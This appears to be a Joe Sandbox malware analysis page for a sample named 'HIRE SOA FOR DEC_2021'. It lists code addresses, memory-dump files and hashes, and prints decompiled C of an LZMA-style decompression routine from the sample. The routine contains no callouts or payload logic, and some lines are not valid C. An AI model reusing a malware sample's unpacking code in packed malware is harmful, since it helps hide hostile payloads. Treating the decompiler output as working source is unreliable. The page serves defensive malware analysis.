0x00406272
0x00406276
0x00406279
0x0040627f
0x00406281
0x00406281
0x00406281
0x00406284
0x00406287
0x00406287
0x0040628d
0x0040622b
0x0040622b
0x0040622e
0x00000000
0x0040622e
0x0040628f
0x0040628f
0x00406292
0x00406295
0x00406298
0x0040629b
0x0040629e
0x004062a1
0x004062a4
0x004062a7
0x004062aa
0x004062ad
0x004062c5
0x004062c8
0x004062cb
0x004062ce
0x004062ce
0x004062d1
0x004062d5
0x004062d7
0x004062af
0x004062af
0x004062b7
0x004062bc
0x004062be
0x004062c0
0x004062c0
0x004062da
0x004062e1
0x004062e4
0x00000000
0x004062e6
0x00000000
0x004062e6
0x00000000
0x00406573
0x00406573
0x00406577
0x0040689e
0x00000000
0x0040689e
0x0040657d
0x00406580
0x00406583
0x00406587
0x0040658a
0x00406590
0x00406592
0x00406592
0x00406592
0x00406595
0x00000000
0x00000000
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x00000000
0x00406682
0x00406686
0x004066a8
0x004066ab
0x004066b5
0x004066b8
0x004066b8
0x004066b8
0x00000000
0x004066b8
0x004066b8
0x00406688
0x0040668b
0x0040668f
0x00406692
0x00406692
0x00406695
0x00000000
0x00000000
0x0040673f
0x00406743
0x00406761
0x00406761
0x00406761
0x00406768
0x0040676f
0x00406776
0x00406776
0x00000000
0x00406776
0x00406745
0x00406748
0x0040674b
0x0040674e
0x00406755
0x00406699
0x00406699
0x0040669c
0x00000000
0x00000000
0x00406830
0x00406833
0x00406734
0x00000000
0x00000000
0x0040646a
0x0040646c
0x00406473
0x00406474
0x00406476
0x00406479
0x00000000
0x00000000
0x00406481
0x00406484
0x00406487
0x00406489
0x0040648b
0x0040648b
0x0040648c
0x0040648f
0x00406496
0x00406499
0x004064a7
0x00000000
0x00000000
0x0040677d
0x0040677d
0x00406780
0x00406787
0x00000000
0x00000000
0x0040678c
0x0040678c
0x00406790
0x004068c8
0x00000000
0x004068c8
0x00406796
0x00406799
0x0040679c
0x004067a0
0x004067a3
0x004067a9
0x004067ab
0x004067ab
0x004067ab
0x004067ae
0x004067b1
0x004067b1
0x004067b1
0x004067b1
0x004067b4
0x004067b4
0x004067b8
0x00406818
0x0040681b
0x00406820
0x00406821
0x00406823
0x00406825
0x00406828
0x00406734
0x00406734
0x00000000
0x0040673a
0x00406734
0x004067ba
0x004067c0
0x004067c3
0x004067c6
0x004067c9
0x004067cc
0x004067cf
0x004067d2
0x004067d5
0x004067d8
0x004067db
0x004067f4
0x004067f7
0x004067fa
0x004067fd
0x00406801
0x00406803
0x00406803
0x00406804
0x00406807
0x004067dd
0x004067dd
0x004067e5
0x004067ea
0x004067ec
0x004067ef
0x004067ef
0x0040680a
0x00406811
0x00000000
0x00406813
0x00000000
0x00406813
0x00000000
0x004064af
0x004064b2
0x004064e8
0x00406618
0x00406618
0x00406618
0x00406618
0x0040661b
0x0040661b
0x0040661e
0x00406620
0x004068aa
0x00000000
0x004068aa
0x00406626
0x00406629
0x00000000
0x00000000
0x0040662f
0x00406633
0x00406636
0x00406636
0x00406636
0x00000000
0x00406636
0x004064b4
0x004064b6
0x004064b8
0x004064ba
0x004064bd
0x004064be
0x004064c0
0x004064c2
0x004064c5
0x004064c8
0x004064de
0x004064e3
0x0040651b
0x0040651b
0x0040651f
0x0040654b
0x0040654d
0x00406554
0x00406557
0x0040655a
0x0040655a
0x0040655f
0x0040655f
0x00406561
0x00406564
0x0040656b
0x0040656e
0x0040659b
0x0040659b
0x0040659e
0x004065a1
0x00406615
0x00406615
0x00406615
0x00000000
0x00406615
0x004065a3
0x004065a9
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b8
0x004065bb
0x004065be
0x004065c1
0x004065c4
0x004065dd
0x004065df
0x004065e2
0x004065e3
0x004065e6
0x004065e8
0x004065eb
0x004065ed
0x004065ef
0x004065f2
0x004065f4
0x004065f7
0x004065fb
0x004065fd
0x004065fd
0x004065fe
0x00406601
0x00406604
0x004065c6
0x004065c6
0x004065ce
0x004065d3
0x004065d5
0x004065d8
0x004065d8
0x00406607
0x0040660e
0x00406598
0x00406598
0x00406598
0x00406598
0x00000000
0x00406610
0x00000000
0x00406610
0x0040660e
0x00406521
0x00406524
0x00406526
0x00406529
0x0040652c
0x0040652f
0x00406531
0x00406534
0x00406537
0x00406537
0x0040653a
0x0040653a
0x0040653d
0x00406544
0x00406518
0x00406518
0x00406518
0x00406518
0x00000000
0x00406546
0x00000000
0x00406546
0x00406544
0x004064ca
0x004064cd
0x004064cf
0x004064d2
0x00000000
0x00000000
0x00406231
0x00406231
0x00406235
0x0040687a
0x00000000
0x0040687a
0x0040623b
0x0040623e
0x00406241
0x00406244
0x00406247
0x0040624a
0x0040624d
0x0040624f
0x00406252
0x00406255
0x00406258
0x0040625a
0x0040625a
0x0040625a
0x00000000
0x00000000
0x004063bc
0x004063bc
0x004063c0
0x00406886
0x00000000
0x00406886
0x004063c6
0x004063c9
0x004063cc
0x004063cf
0x004063d1
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x00000000
0x00000000
0x00406639
0x00406639
0x00406639
0x0040663d
0x00000000
0x00000000
0x00406643
0x00406646
0x00406649
0x0040664c
0x0040664e
0x0040664e
0x0040664e
0x00406651
0x00406654
0x00406657
0x0040665a
0x0040665d
0x00406660
0x00406661
0x00406663
0x00406663
0x00406663
0x00406666
0x00406669
0x0040666c
0x0040666f
0x00406672
0x00406676
0x00406678
0x0040667b
0x00000000
0x0040667d
0x004063fa
0x004063fa
0x00000000
0x004063fa
0x0040667b
0x004068b0
0x00000000
0x00000000
0x00405edf
0x004068e7
0x004068e7
0x00000000
0x004068e7
0x00406734
0x004066bb
0x004066b8
0x00000000
0x004062ef

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction ID: 4708b7c85b45d81bde2c34293bfadd2d5d28089b3d5bcf645a888e2e7e0fcfc2
Opcode Fuzzy Hash: 25af1c67d90c65bbedd3736b3b8ac70fc4bdcff7d4c70ba7fb1a825d48c8a324
Instruction Fuzzy Hash: 91711371D00229DFDF24CFA8C844BADBBB1FB44305F15816AD816B7281D7389996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406409 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406409() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
